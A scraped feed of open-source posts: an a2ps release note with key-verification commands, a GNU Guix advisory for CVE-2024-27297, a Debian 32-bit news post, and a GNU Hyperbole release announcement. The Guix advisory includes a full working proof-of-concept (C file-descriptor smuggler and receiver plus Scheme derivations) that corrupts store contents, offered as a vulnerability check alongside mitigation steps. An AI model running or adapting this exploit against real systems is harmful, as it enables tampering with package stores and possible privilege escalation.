uid Reuben Thomas rrt@sc3d.org

uid keybase.io/rrt rrt@keybase.io

If that command fails because you don't have the required public key, or that public key has expired, try the following commands to retrieve or refresh it, and then rerun the 'gpg --verify' command.

gpg --locate-external-key rrt@sc3d.org

gpg --recv-keys 4C8EF3DA3FD37230

wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=a2ps&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU keyring:

wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg

gpg --keyring gnu-keyring.gpg --verify a2ps-4.15.6.tar.gz.sig

This release was bootstrapped with the following tools:

Autoconf 2.71

Automake 1.16.5

Gnulib v0.1-7186-g5aa8eafc0e

NEWS

  • Noteworthy changes in release 4.15.6 (2024-03-13) [stable]
  • Bug fixes:
    - Fix a2ps-lpr-wrapper to work with no arguments, as a2ps requires.
    - Minor fixes & improvements to sheets.map for image types and PDF.
  • Build system:
    - Minor fixes and improvements.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNU Guix: Fixed-Output Derivation Sandbox Bypass (CVE-2024-27297)

A security issue has been identified in guix-daemon which allows for fixed-output derivations, such as source code tarballs or Git checkouts, to be corrupted by an unprivileged user. This could also lead to local privilege escalation. This was originally reported to Nix but also affects Guix as we share some underlying code from an older version of Nix for the guix-daemon. Readers only interested in making sure their Guix is up to date and no longer affected by this vulnerability can skip down to the "Upgrading" section.

Vulnerability

The basic idea of the attack is to pass file descriptors through Unix sockets to allow another process to modify the derivation contents. This was first reported to Nix by jade and puckipedia with further details and a proof of concept here. Note that the proof of concept is written for Nix and has been adapted for GNU Guix below. This security advisory is registered as CVE-2024-27297 (details are also available at Nix's GitHub security advisory) and rated "moderate" in severity.

A fixed-output derivation is one where the output hash is known in advance, for instance one that produces a source tarball. The GNU Guix build sandbox purposefully excludes network access (for security and to ensure we can control and reproduce the build environment), but a fixed-output derivation does have network access, for instance to download that source tarball. However, as stated, the hash of the output must be known in advance, again for security (we know if the file contents would change) and reproducibility (the derivation should always have the same output). The guix-daemon, a privileged process, handles the build and writes the output to the store.

In the build sandbox for a fixed-output derivation, a file descriptor to its contents could be shared with another process via a Unix socket. This other process, outside of the build sandbox, can then modify the contents written to the store, changing them to something malicious or otherwise corrupting the output. While the output hash has already been determined, these changes would mean a fixed-output derivation could have contents written to the store which do not match the expected hash. This could then be used by the user or other packages as well.

Mitigation

This security issue (tracked here for GNU Guix) has been fixed by two commits by Ludovic Courtès. Users should make sure they have updated to this second commit to be protected from this vulnerability. Upgrade instructions are in the following section.

While several possible mitigation strategies were detailed in the original report, the simplest fix is to just copy the derivation output somewhere else, deleting the original, before writing to the store. Any file descriptors will no longer point to the contents which get written to the store, so only the guix-daemon should be able to write to the store, as designed. This is what the Nix project used in their own fix. This does add an additional copy/delete for each file, which may add a performance penalty for derivations with many files.
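To illustrate the principle with a hedged shell sketch (not the daemon's actual code; paths are made up): copying creates a fresh inode, so a file descriptor smuggled out of the sandbox keeps pointing at the old, deleted file rather than at what lands in the store.

cp output output.tmp              # fresh inode; no foreign fds refer to it
rm output                         # the leaked fd now points at an orphaned inode
mv output.tmp /gnu/store/...-out  # only the clean copy reaches the store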

A proof of concept by Ludovic, adapted from the one in the original Nix report, is available at the end of this post. One can run this code with

guix build -f fixed-output-derivation-corruption.scm -M4

This will output whether the current guix-daemon being used is vulnerable or not. If it is vulnerable, the output will include a line similar to

We managed to corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261, meaning that YOUR SYSTEM IS VULNERABLE!

The corrupted file can be removed with

guix gc -D /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd*

In general, corrupt files from the store can be found with

guix gc --verify=contents

which will also include any files corrupted through this vulnerability. Do note that this command can take a long time to complete as it checks every file under /gnu/store, which likely has many files.

Upgrading

Due to the severity of this security advisory, we strongly recommend all users to upgrade their guix-daemon immediately.

For a Guix System the procedure is just reconfiguring the system after a guix pull, either restarting guix-daemon or rebooting. For example,

guix pull
sudo guix system reconfigure /run/current-system/configuration.scm
sudo herd restart guix-daemon

where /run/current-system/configuration.scm is the current system configuration but could, of course, be replaced by a system configuration file of a user's choice.

For Guix running as a package manager on other distributions, one needs to guix pull with sudo, as the guix-daemon runs as root, and restart the guix-daemon service. For example, on a system using systemd to manage services,

sudo --login guix pull
sudo systemctl restart guix-daemon.service

Note that for users with their distro's package of Guix (as opposed to having used the install script) you may need to take other steps or upgrade the Guix package as per other packages on your distro. Please consult the relevant documentation from your distro or contact the package maintainer for additional information or questions.

Conclusion

One of the key features and design principles of GNU Guix is to allow unprivileged package management through a secure and reproducible build environment. While every effort is made to protect the user and system from any malicious actors, it is always possible that there are flaws yet to be discovered, as has happened here. In this case, exploiting how file descriptors and Unix sockets work even in the isolated build environment allowed for a security vulnerability of moderate impact.

Our thanks to jade and puckipedia for the original report, and Picnoir for bringing this to the attention of the GNU Guix security team. And a special thanks to Ludovic Courtès for a prompt fix and proof of concept.

Note that there are current efforts to rewrite the guix-daemon in Guile by Christopher Baines. For more information and the latest news on this front, please refer to the recent blog post and this message on the guix-devel mailing list.

Proof of Concept

Below is code to check if a guix-daemon is vulnerable to this exploit. Save this file as fixed-output-derivation-corruption.scm and run following the instructions above, in "Mitigation." Some further details and example output can be found on issue #69728

;; Checking for CVE-2024-27297.
;; Adapted from <https://hackmd.io/03UGerewRcy3db44JQoWvw>.

(use-modules (guix)
             (guix modules)
             (guix profiles)
             (gnu packages)
             (gnu packages gnupg)
             (gcrypt hash)
             ((rnrs bytevectors) #:select (string->utf8)))

(define (compiled-c-code name source)
  (define build-profile
    (profile (content (specifications->manifest '("gcc-toolchain")))))

  (define build
    (with-extensions (list guile-gcrypt)
     (with-imported-modules (source-module-closure '((guix build utils)
                                                     (guix profiles)))
       #~(begin
           (use-modules (guix build utils)
                        (guix profiles))
           (load-profile #+build-profile)
           (system* "gcc" "-Wall" "-g" "-O2" #+source "-o" #$output)))))

  (computed-file name build))

(define sender-source
  (plain-file "sender.c" "
      #include <sys/socket.h>
      #include <sys/un.h>
      #include <stdlib.h>
      #include <stddef.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <fcntl.h>
      #include <errno.h>

      int main(int argc, char **argv) {
          setvbuf(stdout, NULL, _IOLBF, 0);

          int sock = socket(AF_UNIX, SOCK_STREAM, 0);

          // Set up an abstract domain socket path to connect to.
          struct sockaddr_un data;
          data.sun_family = AF_UNIX;
          data.sun_path[0] = 0;
          strcpy(data.sun_path + 1, \"dihutenosa\");

          // Now try to connect, To ensure we work no matter what order we are
          // executed in, just busyloop here.
          int res = -1;
          while (res < 0) {
              printf(\"attempting connection...\\n\");
              res = connect(sock, (const struct sockaddr *)&data,
                  offsetof(struct sockaddr_un, sun_path)
                    + strlen(\"dihutenosa\")
                    + 1);
              if (res < 0 && errno != ECONNREFUSED) perror(\"connect\");
              if (errno != ECONNREFUSED) break;
              usleep(500000);
          }

          // Write our message header.
          struct msghdr msg = {0};
          msg.msg_control = malloc(128);
          msg.msg_controllen = 128;

          // Write an SCM_RIGHTS message containing the output path.
          struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
          hdr->cmsg_len = CMSG_LEN(sizeof(int));
          hdr->cmsg_level = SOL_SOCKET;
          hdr->cmsg_type = SCM_RIGHTS;
          int fd = open(getenv(\"out\"), O_RDWR | O_CREAT, 0640);
          memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));

          msg.msg_controllen = CMSG_SPACE(sizeof(int));

          // Write a single null byte too.
          msg.msg_iov = malloc(sizeof(struct iovec));
          msg.msg_iov[0].iov_base = \"\";
          msg.msg_iov[0].iov_len = 1;
          msg.msg_iovlen = 1;

          // Send it to the other side of this connection.
          res = sendmsg(sock, &msg, 0);
          if (res < 0) perror(\"sendmsg\");
          int buf;

          // Wait for the server to close the socket, implying that it has
          // received the command.
          recv(sock, (void *)&buf, sizeof(int), 0);
      }"))

(define receiver-source
  (mixed-text-file "receiver.c" "
      #include <sys/socket.h>
      #include <sys/un.h>
      #include <stdlib.h>
      #include <stddef.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <sys/inotify.h>

      int main(int argc, char **argv) {
          int sock = socket(AF_UNIX, SOCK_STREAM, 0);

          // Bind to the socket.
          struct sockaddr_un data;
          data.sun_family = AF_UNIX;
          data.sun_path[0] = 0;
          strcpy(data.sun_path + 1, \"dihutenosa\");
          int res = bind(sock, (const struct sockaddr *)&data,
              offsetof(struct sockaddr_un, sun_path)
              + strlen(\"dihutenosa\")
              + 1);
          if (res < 0) perror(\"bind\");

          res = listen(sock, 1);
          if (res < 0) perror(\"listen\");

          while (1) {
              setvbuf(stdout, NULL, _IOLBF, 0);
              printf(\"accepting connections...\\n\");
              int a = accept(sock, 0, 0);
              if (a < 0) perror(\"accept\");

              struct msghdr msg = {0};
              msg.msg_control = malloc(128);
              msg.msg_controllen = 128;

              // Receive the file descriptor as sent by the smuggler.
              recvmsg(a, &msg, 0);

              struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
              while (hdr) {
                  if (hdr->cmsg_level == SOL_SOCKET
                   && hdr->cmsg_type == SCM_RIGHTS) {
                      int res;

                      // Grab the copy of the file descriptor.
                      memcpy((void *)&res, CMSG_DATA(hdr), sizeof(int));
                      printf(\"preparing our hand...\\n\");

                      ftruncate(res, 0);
                      // Write the expected contents to the file, tricking Nix
                      // into accepting it as matching the fixed-output hash.
                      write(res, \"hello, world\\n\", strlen(\"hello, world\\n\"));

                      // But wait, the file is bigger than this! What could
                      // this code hide?

                      // First, we do a bit of a hack to get a path for the
                      // file descriptor we received. This is necessary because
                      // that file doesn't exist in our mount namespace!
                      char buf[128];
                      sprintf(buf, \"/proc/self/fd/%d\", res);

                      // Hook up an inotify on that file, so whenever Nix
                      // closes the file, we get notified.
                      int inot = inotify_init();
                      inotify_add_watch(inot, buf, IN_CLOSE_NOWRITE);

                      // Notify the smuggler that we've set everything up for
                      // the magic trick we're about to do.
                      close(a);

                      // So, before we continue with this code, a trip into Nix
                      // reveals a small flaw in fixed-output derivations. When
                      // storing their output, Nix has to hash them twice. Once
                      // to verify they match the \"flat\" hash of the derivation
                      // and once more after packing the file into the NAR that
                      // gets sent to a binary cache for others to consume. And
                      // there's a very slight window inbetween, where we could
                      // just swap the contents of our file. But the first hash
                      // is still noted down, and Nix will refuse to import our
                      // NAR file. To trick it, we need to write a reference to
                      // a store path that the source code for the smuggler drv
                      // references, to ensure it gets picked up. Continuing...

                      // Wait for the next inotify event to drop:
                      read(inot, buf, 128);

                      // first read + CA check has just been done, Nix is about
                      // to chown the file to root. afterwards, refscanning
                      // happens...

                      // Empty the file, seek to start.
                      ftruncate(res, 0);
                      lseek(res, 0, SEEK_SET);

                      // We swap out the contents!
                      static const char content[] = \"This file has been corrupted!\\n\";
                      write(res, content, strlen (content));
                      close(res);

                      printf(\"swaptrick finished, now to wait..\\n\");
                      return 0;
                  }

                  hdr = CMSG_NXTHDR(&msg, hdr);
              }
              close(a);
          }
      }"))

(define nonce
  (string-append "-" (number->string (car (gettimeofday)) 16)
                 "-" (number->string (getpid))))

(define original-text
  "This is the original text, before corruption.")

(define derivation-that-exfiltrates-fd
  (computed-file (string-append "derivation-that-exfiltrates-fd" nonce)
                 (with-imported-modules '((guix build utils))
                   #~(begin
                       (use-modules (guix build utils))
                       (invoke #+(compiled-c-code "sender" sender-source))
                       (call-with-output-file #$output
                         (lambda (port)
                           (display #$original-text port)))))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256
                                      (string->utf8 original-text)))))

(define derivation-that-grabs-fd
  (computed-file (string-append "derivation-that-grabs-fd" nonce)
                 #~(begin
                     (open-output-file #$output) ;make sure there's an output
                     (execl #+(compiled-c-code "receiver" receiver-source)
                            "receiver"))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256 #vu8()))))

(define check
  (computed-file "checking-for-vulnerability"
                 #~(begin
                     (use-modules (ice-9 textual-ports))

                     (mkdir #$output)            ;make sure there's an output
                     (format #t "This depends on ~a, which will grab the file
descriptor and corrupt ~a.~%~%"
                             #+derivation-that-grabs-fd
                             #+derivation-that-exfiltrates-fd)

                     (let ((content (call-with-input-file
                                        #+derivation-that-exfiltrates-fd
                                      get-string-all)))
                       (format #t "Here is what we see in ~a: ~s~%~%"
                               #+derivation-that-exfiltrates-fd content)
                       (if (string=? content #$original-text)
                           (format #t "Failed to corrupt ~a, \
your system is safe.~%"
                                   #+derivation-that-exfiltrates-fd)
                           (begin
                             (format #t "We managed to corrupt ~a, \
meaning that YOUR SYSTEM IS VULNERABLE!~%"
                                     #+derivation-that-exfiltrates-fd)
                             (exit 1)))))))

check

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64, and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

#gnu #gnuorg #opensource

grey@sysad.org

Debian is going to drop support for all 32 bit computers in the next release!

https://www.theregister.com/2023/12/19/debian_to_drop_x86_32/

Debian preps ground to drop 32-bit x86 as separate edition
Bad news for several downstream distros, but good news for NetBSD

After a recent meetup in Cambridge, Debian developers are discussing how to start gradually dropping 32-bit x86 support.

One immediately visible result is a message entitled "Bits from the Release Team" on the debian-devel-announce mailing list, with significant news: The end of the line for Debian as a 32-bit distro is approaching. Note, though, this doesn't mean that 32-bit support is going away altogether. Not yet anyway.

The news is in a section titled "A future for the i386 architecture":

Insofar as they still do, we anticipate that the kernel, d-i and images teams will cease to support i386 in the near future.

So, this really sucks for a lot of other people and distros. Like it or not, there's shitloads of 32-bit hardware around the planet. A lot of it is currently running! Sadly most of it is running Windows, still, which is bad because it's so unsafe to keep old versions of Windows touching the internet. But much of it is kept both running and safe by having it run Debian, or a 32-bit distro based on Debian. For any old hardware, most people's go-to distro is Debian. Nobody else is supporting old hardware like Debian is. Plus if someone wants to make their own spin on a distro for old hardware they pretty much always use Debian as a base for it, so there's a lot of distros out there that are gonna die because of this. Like for example #antix #mxlinux #bunsenlabs #slax #peppermintos so this sucks bad.

#debian #32bit #linux #gnu

federatica_bot@federatica.space

hyperbole @ Savannah: GNU Hyperbole Major Release 9 (V9.0.1) Rhapsody

Overview

GNU Hyperbole 9.0.1, the Rhapsody release, is now available on GNU ELPA.

And oh what a release it is: extensive new features, new video demos, Org and Org Roam integration, Markdown and Org file support in HyRolo, recursive directory and wildcard file scanning in HyRolo, and much more.

What's new in this release is extensively described here:

www.gnu.org/s/hyperbole/HY-NEWS.html

Everything back until release 8.0.0 is new since the last major release announcement (almost a year and a half ago), so updates are extensive.

Hyperbole is like Markdown for hypertext. Hyperbole automatically recognizes dozens of common patterns in any buffer regardless of mode and transparently turns them into hyperbuttons you can instantly activate with a single key: email addresses, URLs, grep -n outputs, programming backtraces, sequences of Emacs keys, programming identifiers, Texinfo and Info cross-references, Org links, Markdown links and on and on. All you do is load Hyperbole and then your text comes to life with no extra effort or complex formatting.

But Hyperbole is also a personal information manager with built-in capabilities of contact management/hierarchical record lookup, legal-numbered outlines with hyperlinkable views and a unique window and frame manager. It is even Org-compatible so you can use all of Org's capabilities together with Hyperbole.

Hyperbole stays out of your way but is always a key press away when you need it. Like Emacs, Org, Counsel and Helm, Hyperbole has many different uses, all based around the theme of reducing cognitive load and improving your everyday information management. It reduces cognitive load by using a single Action Key, {M-RET}, across many different contexts to perform the best default action in each.

Hyperbole has always been one of the best documented Emacs packages. With Version 9 comes excellent test coverage: over 400 automated tests are run with every update against every major version of Emacs since version 27, to ensure quality. We hope you'll give it a try.

Videos

If you prefer video introductions, visit the videos linked to below; otherwise, skip to the next section.

GNU Hyperbole Videos with Web Links

Installing and Using Hyperbole

To install within GNU Emacs, use:

{M-x package-install RET hyperbole RET}

Hyperbole installs in less than a minute and can be uninstalled even faster if ever need be. Give it a try.

Then to invoke its minibuffer menu, use:

{C-h h} or {M-x hyperbole RET}

The best way to get a feel for many of its capabilities is to invoke the all new, interactive FAST-DEMO and explore sections of interest:

{C-h h d d}

To permanently activate Hyperbole in your Emacs initialization file, add the line:

(hyperbole-mode 1)

Hyperbole is a minor mode that may be disabled at any time with:

{C-u 0 hyperbole-mode RET}

The Hyperbole home page with screenshots is here:

www.gnu.org/s/hyperbole

For use cases, see:

www.gnu.org/s/hyperbole/HY-WHY.html

For what users think about Hyperbole, see:

www.gnu.org/s/hyperbole/hyperbole.html#user-quotes

Enjoy,

The Hyperbole Team

#gnu #gnuorg #opensource